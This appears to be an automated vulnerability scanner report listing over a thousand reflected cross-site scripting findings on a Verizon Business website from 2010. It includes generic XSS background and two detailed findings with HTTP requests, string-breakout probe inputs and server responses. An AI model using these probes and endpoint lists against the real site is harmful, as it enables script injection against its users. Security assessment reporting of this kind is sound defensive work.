1.904. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 1]

1.905. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 2]

1.906. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 2]

1.907. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 3]

1.908. http://www.verizonbusiness.com/solutions/byneed/sustainability/ [REST URL parameter 3]

1.909. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 1]

1.910. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 1]

1.911. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 2]

1.912. http://www.verizonbusiness.com/solutions/bysolutions/ [REST URL parameter 2]

1.913. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 1]

1.914. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 1]

1.915. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 2]

1.916. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 2]

1.917. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 3]

1.918. http://www.verizonbusiness.com/solutions/bysolutions/app-performance/ [REST URL parameter 3]

1.919. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 1]

1.920. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 1]

1.921. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 2]

1.922. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 2]

1.923. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 3]

1.924. http://www.verizonbusiness.com/solutions/bysolutions/automation/ [REST URL parameter 3]

1.925. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 1]

1.926. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 1]

1.927. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 2]

1.928. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 2]

1.929. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 3]

1.930. http://www.verizonbusiness.com/solutions/bysolutions/cloud/ [REST URL parameter 3]

1.931. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 1]

1.932. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 1]

1.933. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 2]

1.934. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 2]

1.935. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 3]

1.936. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 3]

1.937. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 1]

1.938. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 1]

1.939. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 2]

1.940. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 2]

1.941. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 3]

1.942. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 3]

1.943. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 1]

1.944. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 1]

1.945. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 2]

1.946. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 2]

1.947. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 3]

1.948. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 3]

1.949. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 1]

1.950. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 1]

1.951. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 2]

1.952. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 2]

1.953. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 3]

1.954. http://www.verizonbusiness.com/solutions/bysolutions/field/ [REST URL parameter 3]

1.955. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 1]

1.956. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 1]

1.957. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 2]

1.958. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 2]

1.959. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 3]

1.960. http://www.verizonbusiness.com/solutions/bysolutions/infrastructure/ [REST URL parameter 3]

1.961. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 1]

1.962. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 1]

1.963. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 2]

1.964. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 2]

1.965. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 3]

1.966. http://www.verizonbusiness.com/solutions/bysolutions/managed/ [REST URL parameter 3]

1.967. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 1]

1.968. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 1]

1.969. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 2]

1.970. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 2]

1.971. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 3]

1.972. http://www.verizonbusiness.com/solutions/bysolutions/networking/ [REST URL parameter 3]

1.973. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 1]

1.974. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 1]

1.975. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 2]

1.976. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 2]

1.977. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 3]

1.978. http://www.verizonbusiness.com/solutions/bysolutions/outsourcing/ [REST URL parameter 3]

1.979. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 1]

1.980. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 1]

1.981. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 2]

1.982. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 2]

1.983. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 3]

1.984. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 3]

1.985. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 1]

1.986. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 1]

1.987. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 2]

1.988. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 2]

1.989. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 3]

1.990. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 3]

1.991. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 1]

1.992. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 1]

1.993. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 2]

1.994. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 2]

1.995. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 3]

1.996. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 3]

1.997. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 1]

1.998. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 1]

1.999. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 2]

1.1000. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 2]

1.1001. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 3]

1.1002. http://www.verizonbusiness.com/solutions/bysolutions/ucc/ [REST URL parameter 3]

1.1003. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 1]

1.1004. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 1]

1.1005. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 2]

1.1006. http://www.verizonbusiness.com/solutions/education/ [REST URL parameter 2]

1.1007. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 1]

1.1008. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 1]

1.1009. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 2]

1.1010. http://www.verizonbusiness.com/solutions/finance/ [REST URL parameter 2]

1.1011. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 1]

1.1012. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 1]

1.1013. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 2]

1.1014. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 2]

1.1015. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 1]

1.1016. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 1]

1.1017. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 2]

1.1018. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 2]

1.1019. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 1]

1.1020. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 1]

1.1021. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 2]

1.1022. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 2]

1.1023. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 1]

1.1024. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 1]

1.1025. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 2]

1.1026. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 2]

1.1027. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 1]

1.1028. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 1]

1.1029. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 2]

1.1030. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 2]

1.1031. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 3]

1.1032. http://www.verizonbusiness.com/solutions/var/index.xml [REST URL parameter 3]

1.1033. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 1]

1.1034. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 1]

1.1035. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 2]

1.1036. http://www.verizonbusiness.com/solutions/wholesale/ [REST URL parameter 2]

1.1037. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 1]

1.1038. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 1]

1.1039. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 2]

1.1040. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 2]

1.1041. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 3]

1.1042. http://www.verizonbusiness.com/solutions/wholesale/ips/ [REST URL parameter 3]

1.1043. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 1]

1.1044. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 1]

1.1045. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 2]

1.1046. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 2]

1.1047. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 3]

1.1048. http://www.verizonbusiness.com/solutions/wholesale/us/ [REST URL parameter 3]

1.1049. http://www.verizonbusiness.com/support/ [REST URL parameter 1]

1.1050. http://www.verizonbusiness.com/support/ [REST URL parameter 1]

1.1051. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 1]

1.1052. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 1]

1.1053. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 2]

1.1054. http://www.verizonbusiness.com/support/myaccount/ [REST URL parameter 2]

1.1055. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 1]

1.1056. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 1]

1.1057. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 2]

1.1058. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 2]

1.1059. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 3]

1.1060. http://www.verizonbusiness.com/support/myaccount/tools/ [REST URL parameter 3]

1.1061. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 1]

1.1062. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 1]

1.1063. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 2]

1.1064. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 2]

1.1065. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 3]

1.1066. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 3]

1.1067. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 4]

1.1068. http://www.verizonbusiness.com/support/myaccount/tools/center/ [REST URL parameter 4]

1.1069. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 1]

1.1070. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 1]

1.1071. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 2]

1.1072. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 2]

1.1073. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 3]

1.1074. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 3]

1.1075. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 4]

1.1076. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 4]

1.1077. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 1]

1.1078. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 1]

1.1079. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 2]

1.1080. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 2]

1.1081. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 3]

1.1082. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 3]

1.1083. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 4]

1.1084. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 4]

1.1085. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 1]

1.1086. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 1]

1.1087. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 2]

1.1088. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 2]

1.1089. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 1]

1.1090. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 1]

1.1091. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 2]

1.1092. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 2]

1.1093. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 1]

1.1094. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 1]

1.1095. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 2]

1.1096. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 2]

1.1097. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 4]

1.1098. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 4]

1.1099. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 1]

1.1100. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 1]

1.1101. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 2]

1.1102. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 2]

1.1103. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 3]

1.1104. http://www.verizonbusiness.com/templates/vzbar/bert.xml [REST URL parameter 3]

1.1105. http://www.verizonbusiness.com/terms/ [REST URL parameter 1]

1.1106. http://www.verizonbusiness.com/terms/ [REST URL parameter 1]

1.1107. http://www.verizonbusiness.com/thinkforward/ [REST URL parameter 1]

1.1108. http://www.verizonbusiness.com/thinkforward/ [REST URL parameter 1]

1.1109. http://www.verizonbusiness.com/topnav.xml [REST URL parameter 1]

1.1110. http://www.verizonbusiness.com/topnav.xml [REST URL parameter 1]

1.1111. http://www.verizonbusiness.com/tw/ [REST URL parameter 1]

1.1112. http://www.verizonbusiness.com/tw/ [REST URL parameter 1]

1.1113. http://www.verizonbusiness.com/uk/ [REST URL parameter 1]

1.1114. http://www.verizonbusiness.com/uk/ [REST URL parameter 1]

1.1115. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 1]

1.1116. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 1]

1.1117. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 2]

1.1118. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 2]

1.1119. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 3]

1.1120. http://www.verizonbusiness.com/uk/solutions/var/ [REST URL parameter 3]

1.1121. http://www.verizonbusiness.com/us/ [REST URL parameter 1]

1.1122. http://www.verizonbusiness.com/us/ [REST URL parameter 1]

1.1123. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 1]

1.1124. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 1]

1.1125. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 2]

1.1126. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 2]

1.1127. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 3]

1.1128. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 3]

1.1129. http://www.verizonbusiness.com/us/support/ [REST URL parameter 1]

1.1130. http://www.verizonbusiness.com/us/support/ [REST URL parameter 1]

1.1131. http://www.verizonbusiness.com/us/support/ [REST URL parameter 2]

1.1132. http://www.verizonbusiness.com/us/support/ [REST URL parameter 2]

1.1133. http://www.verizonbusiness.com/ve/ [REST URL parameter 1]

1.1134. http://www.verizonbusiness.com/ve/ [REST URL parameter 1]

1.1135. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]

1.1136. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 1]

1.1137. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]

1.1138. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 2]

1.1139. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 3]

1.1140. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 3]

1.1141. http://www.verizonbusiness.com/worldwide/resources/media/index-131046-wifi+shopping+borders.xml [REST URL parameter 4]

1.1142. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 1]

1.1143. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 1]

1.1144. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 2]

1.1145. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 2]

1.1146. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 3]

1.1147. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 3]

1.1148. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 4]

1.1149. http://www.verizonbusiness.com/worldwide/resources/media/index.xml [REST URL parameter 4]

1.1150. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 1]

1.1151. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 1]

1.1152. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 2]

1.1153. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 2]

1.1154. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 3]

1.1155. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 3]

1.1156. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 4]

1.1157. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 1]

1.1158. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 1]

1.1159. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 2]

1.1160. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 2]

1.1161. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 3]

1.1162. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 3]

1.1163. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 4]

1.1164. http://www.verizonbusiness.com/Medium/ [User-Agent HTTP header]

1.1165. http://www.verizonbusiness.com/ar/ [User-Agent HTTP header]

1.1166. http://www.verizonbusiness.com/at/ [User-Agent HTTP header]

1.1167. http://www.verizonbusiness.com/cl/ [User-Agent HTTP header]

1.1168. http://www.verizonbusiness.com/co/ [User-Agent HTTP header]

1.1169. http://www.verizonbusiness.com/de/ [User-Agent HTTP header]

1.1170. http://www.verizonbusiness.com/es/ [User-Agent HTTP header]

1.1171. http://www.verizonbusiness.com/fr/ [User-Agent HTTP header]

1.1172. http://www.verizonbusiness.com/jp/ [User-Agent HTTP header]

1.1173. http://www.verizonbusiness.com/mx/ [User-Agent HTTP header]

1.1174. http://www.verizonbusiness.com/pa/ [User-Agent HTTP header]

1.1175. http://www.verizonbusiness.com/ve/ [User-Agent HTTP header]



1. Cross-site scripting (reflected)
There are 1175 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.verizonbusiness.com/Medium/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d0f9"%3b46e9706f56f was submitted in the REST URL parameter 1. This input was echoed as 6d0f9";46e9706f56f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium6d0f9"%3b46e9706f56f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:03 GMT
Content-Type: text/html
Content-Length: 21448
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Medium6d0f9";46e9706f56f/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.2. http://www.verizonbusiness.com/Medium/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Medium/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e43b'%3bf51cd8dd011 was submitted in the REST URL parameter 1. This input was echoed as 5e43b';f51cd8dd011 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium5e43b'%3bf51cd8dd011/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42595
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Medium5e43b';f51cd8dd011/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

